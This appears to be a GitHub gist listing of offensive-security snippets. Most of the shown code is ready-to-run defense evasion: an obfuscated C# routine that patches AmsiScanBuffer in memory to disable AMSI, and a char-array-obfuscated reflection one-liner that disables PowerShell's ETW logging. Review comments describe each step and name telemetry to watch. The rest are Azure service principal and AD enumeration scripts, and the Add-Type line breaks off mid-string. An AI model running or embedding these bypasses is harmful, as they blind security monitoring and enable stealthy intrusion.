
# AMSI liveness check. The marker string is assembled at run time from two
# fragments (presumably so the script text itself never holds the complete
# "AMSI Test Sample" marker) and then handed to Invoke-Expression, which
# submits the content to AMSI before evaluating it. With a working AMSI the
# invocation is blocked; with AMSI disabled or patched it reaches the parser.
$teststring = -join ('AMSI Test Sample: ', '7e72c3ce-861b-4339-8740-0ac1484c1386')
Invoke-Expression -Command $teststring
m8r1us / AMSI
Created December 10, 2024 13:03
# Obfuscated C# source for an in-memory assembly. Hyphens are inserted inside
# identifiers and keywords and are stripped again by the `$data.Replace('-…`
# call on the Add-Type line that follows, so the script text never contains
# tokens such as "VirtualProtect" or "kernel32"; "amsi.dll" and
# "AmsiScanBuffer" are additionally built from "a"+"m"+... concatenations.
# De-hyphenated, Program.Run() does the following:
#   1. LoadLibrary("amsi.dll") and GetProcAddress(lib, "AmsiScanBuffer");
#   2. VirtualProtect of 1 byte at AmsiScanBuffer+0x95 to 0x40
#      (PAGE_EXECUTE_READWRITE), printing the previous protection to stdout;
#   3. Marshal.Copy of a single 0x75 byte (x86 JNE rel8 opcode) over that byte;
#   4. VirtualProtect back to the saved protection.
# No return value is checked: if LoadLibrary or GetProcAddress yields
# IntPtr.Zero the write targets address 0x95 and will fault, and a failed
# VirtualProtect is ignored.
# NOTE(review): the hard-coded 0x95 offset is tied to one particular amsi.dll
# build; on a different build the same byte lands on an unrelated instruction.
# Telemetry worth watching for this pattern: Add-Type compiling source at run
# time, and an RWX protection change on a page inside amsi.dll.
$data = @"
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }}
"@
Add-Type $data.Replace('-
# Reflection one-liner that zeroes the private m_enabled flag of PowerShell's
# ETW log provider in this process. Type/field names are assembled from char
# arrays and method names are split with backticks ("G`etField") to defeat
# string matching; decoded, the statement reads:
#   [EventProvider].GetField("m_enabled", "NonPublic,Instance").SetValue(
#       [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider")
#           .GetField("etwProvider", "NonPublic,Static").GetValue($null), 0)
# NOTE(review): the visible code only shows the field being set to 0; the
# intended effect (silencing PowerShell's ETW events, e.g. script block
# logging) is inferred from the provider's name — confirm against the runtime
# version in use. The backtick-split member names and char-array joins are
# themselves a usable detection signature.
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0)
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
m8r1us / PassTheCert.cs
Created April 18, 2024 12:34
modified PassTheCert.cs
// Copyright 2022 Almond (almond.consulting)
//
// Author: Yannick Méheut (ymeheut@almond.consulting)
//
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
m8r1us / consentIsTheMindkiller.ps1
Last active April 8, 2024 14:12
Foreign service principal POC
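# The script is part of the following article: https://www.scip.ch/en/?labs.20240404
$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant)
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant)
# The client secret from the app (Source: Foreign Tenant).
# Read it from the environment instead of pasting it into the script: a value
# committed to a public gist is effectively disclosed and grants whoever holds
# it the application's permissions. If the secret that used to sit on this line
# was a real one, treat it as compromised and rotate it in the foreign tenant.
$spPassword = $env:FOREIGN_APP_SECRET
if ([string]::IsNullOrWhiteSpace($spPassword)) {
    # Fail before any token request is made rather than authenticating with an
    # empty secret and debugging an opaque AADSTS error later.
    throw 'FOREIGN_APP_SECRET is not set; export the client secret in the current session before running this script.'
}
$appName = "foreignApp" # The app name (Source: Foreign Tenant)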
# --------------
#Step 0 (Foreign Tenant): Create an application in the portal
# --------------
m8r1us / checkForForeignServicePrincipals.ps1
Last active October 5, 2024 17:26
Find foreign service principals
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404
# --------------
# Find foreign service principals with application permissions
# --------------
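Write-Host "[*] Log in with a user that has at least the Application.Read.All right `n" -ForegroundColor Green
# -ErrorAction Stop: a failed or cancelled sign-in must abort here instead of
# letting the service-principal checks that follow run without a session and
# silently report nothing.
Connect-MgGraph -Scopes "Application.Read.All" -NoWelcome -ErrorAction Stop
Write-Host "[*] Output the connection context `n" -ForegroundColor Green
$mgcontext = Get-MgContext
if (-not $mgcontext) {
    # Get-MgContext returns $null when no Graph session exists.
    throw 'Connect-MgGraph produced no Graph context; aborting before querying service principals.'
}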
m8r1us / Groupmembers.ps1
Last active March 27, 2024 14:54
Azure AD group members
# Install and import the AzureAD module (if not already installed)
#Install-Module AzureAD -Force
#Import-Module AzureAD
# Interactive sign-in to Azure AD.
# NOTE(review): the AzureAD module is deprecated in favour of Microsoft.Graph
# (Get-MgGroup); confirm it is still installable in the target environment.
Connect-AzureAD
# Retrieve every group (-All $true) rather than the default first page.
$groupQuery = @{ All = $true }
$AllGroups = Get-AzureADGroup @groupQuery
m8r1us / acl.ps1
Created March 14, 2024 15:41
ACL check
function Get-EffectiveAccess {
[CmdletBinding()]
param(
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
[ValidatePattern('(?:(CN=([^,]*)),)?(?:((?:(?:CN|OU)=[^,]+,?)+),)?((?:DC=[^,]+,?)+)$')]
[alias('DistinguishedName')]
[string] $Identity,
m8r1us / adeleg-v2.exe.txt
Last active March 12, 2024 16:17
adeleg.exe.txt
begin-base64 644 -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